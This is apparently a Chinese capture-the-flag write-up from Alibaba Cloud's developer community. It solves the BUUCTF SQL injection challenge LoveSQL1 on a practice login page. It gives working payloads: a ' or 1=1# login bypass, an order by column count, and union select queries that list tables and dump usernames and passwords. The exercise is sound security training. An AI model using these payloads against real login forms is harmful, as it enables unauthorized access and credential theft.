AI 助理
文档备案控制台
开发者社区 数据库 文章 正文

BUUCTF---[极客大挑战 2019]LoveSQL1

2024-05-22 735
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: BUUCTF---[极客大挑战 2019]LoveSQL1

1.题目描述

2.一般遇到登录,用户名会尝试admin,密码会尝试万能密码" or 1=1#或者' or 1=1#。这里尝试了第一种,但是不对。

3.接着尝试第二种' or 1=1#。提示登录成功了说明这里是单引号注入,并给了一串字符

4.sql注入题一般会设计到数据库,因为会用到select查询,所以我们得要知道它的表中有多少列,于是我们用order by来查询列数。

经过两次对比可说明,一共有4列。

5.接下来用联合查询查表,在登录界面的密码框输入下面这段代码,就可以得到表名,一共得到两个表名

1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#

6.接着查表中有哪些字段,先查第一张表在密码输入框输入下面代码(查看geekuser表中字段),就得到了字段名,三个。

1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='geekuser'#

7.接下来查第二张表的字段,在密码输入框中输入下面代码,可以得到字段名,发现和第一张表的字段名一样。

1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'#

8.最后分别查询字段里面的信息,先查第一张表中的字段信息。

1' union select 1,2,group_concat(id,username,password) from geekuser#

9.最后查第二张表的字段信息


 
1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1#

10.flag为

flag{35943351-4544-4af1-a33e-d5e3dde29eda}

11.这是我耗时最长的一道题,但是能弄清它的思路对我来说是受益匪浅的。

文章标签:
数据安全/隐私保护
数据库
不拿flag不改名
目录
相关文章
玥轩
|
数据安全/隐私保护 Python
BUUCTF [SWPU2019]神奇的二维码 1
BUUCTF [SWPU2019]神奇的二维码 1
玥轩
1259 0
BUUCTF [SWPU2019]神奇的二维码 1
不拿flag不改名
BUUCTF---[强网杯 2019]随便注1
BUUCTF---[强网杯 2019]随便注1
不拿flag不改名
391 0
Safenetworkaccess
|
Python
20基础解决-buuctf-1.RSA1
20基础解决-buuctf-1.RSA1
Safenetworkaccess
1039 1
不拿flag不改名
|
SQL 数据库 数据安全/隐私保护
BUUCTF[极客大挑战 2019]EasySQL1
BUUCTF[极客大挑战 2019]EasySQL1
不拿flag不改名
1252 0
是乙太呀
|
算法 安全 数据安全/隐私保护
BUUCTF-[2019红帽杯]easyRE(Reverse逆向)
本文详细介绍了对一个无壳的64位ELF文件进行逆向分析的过程。首先通过IDA查找关键字符串定位主函数,然后逐步分析函数逻辑,包括读取输入、异或操作等。接着通过多次Base64解码和异或操作,最终得到了关键的flag。整个过程涉及数组寻址、条件判断和函数调用等技术细节,展示了CTF竞赛中常见的逆向工程技巧。最后附上了完整的Python代码实现,帮助读者理解和复现。
是乙太呀
1743 1
BUUCTF-[2019红帽杯]easyRE(Reverse逆向)
aliyun6054359135
|
SQL 数据库 数据安全/隐私保护
[极客大挑战 2019]LoveSQL1 题目分析与详解
[极客大挑战 2019]LoveSQL1 题目分析与详解
aliyun6054359135
1688 0
不拿flag不改名
|
Web App开发 Go PHP
BUUCTF---[极客大挑战 2019]Http1
BUUCTF---[极客大挑战 2019]Http1
不拿flag不改名
1211 1
不拿flag不改名
|
数据库 数据安全/隐私保护
BUUCTF---[极客大挑战 2019]BabySQL1
BUUCTF---[极客大挑战 2019]BabySQL1
不拿flag不改名
1003 0
不拿flag不改名
|
PHP
BUUCTF---[ACTF2020 新生赛]BackupFile1
BUUCTF---[ACTF2020 新生赛]BackupFile1
不拿flag不改名
805 0

热门文章

最新文章

  • 1
    并发编程系列之CLH锁
  • 2
    MySQL · 引擎特性 · InnoDB redo log漫游
  • 3
    AliOS Things 3.0应用笔记:支付宝小程序设备控制 - 全栈开发(附全部源码)
  • 4
    阿里云李飞飞:All in Cloud时代,云原生数据库优势明显
  • 5
    阿里云中间件有哪些?这里最全面
  • 6
    【近战2】移动电商搜索个性化技术
  • 7
    12c DataGuard switchover to 'primary'
  • 8
    hdu 2473 Junk-Mail Filter(并查集+虚拟节点)
  • 9
    php获取访客所在城市名称代码
  • 10
    Metro style app 文件、文件夹的选择、文件的保存。
  • 1
    阿里云百炼大模型指南:Token Plan与Coding Plan产品区别及订阅方案、计费规则与活动福利详解
    54
  • 2
    阿里云ECS云服务器零基础部署AI Agent 配置百炼Token Plan 保姆级教程
    55
  • 3
    【.NET 4.5】.NET Framework 4.5下载、安装和使用一篇搞定(附官网安装包)
    48
  • 4
    别和编译器硬刚了!Tauri状态管理与IPC通信的硬核避坑指南
    44
  • 5
    Claude Code自我进化系统解析:AI编程助手持久化记忆与行为学习实现方案
    52
  • 6
    Claude Code AI编程成本优化管控指南:个人开发者省钱实操全解
    50
  • 7
    相关性与因果性:识别伪相关以提升模型在真实环境的可用性
    38
  • 8
    什么时候该升级,什么时候再等等
    43
  • 9
    阿里云百炼通义千问Qwen3.6-Flash完整实操指南:轻量化旗舰功能特性、落地优势与分层优惠订阅方案详解
    71
  • 10
    阿里云百炼Token Plan团队版与Coding Plan核心差异全解析 附团队版全场景常见问题完整答疑
    58

    • 相关电子书

    更多
  • 低代码开发师(初级)实战教程
  • 冬季实战营第三期:MySQL数据库进阶实战
  • 阿里巴巴DevOps 最佳实践手册
    • 下一篇
    阿里云数据库产品支持免费试用吗?最新可试用数据库规格信息、配置及可试用人群参考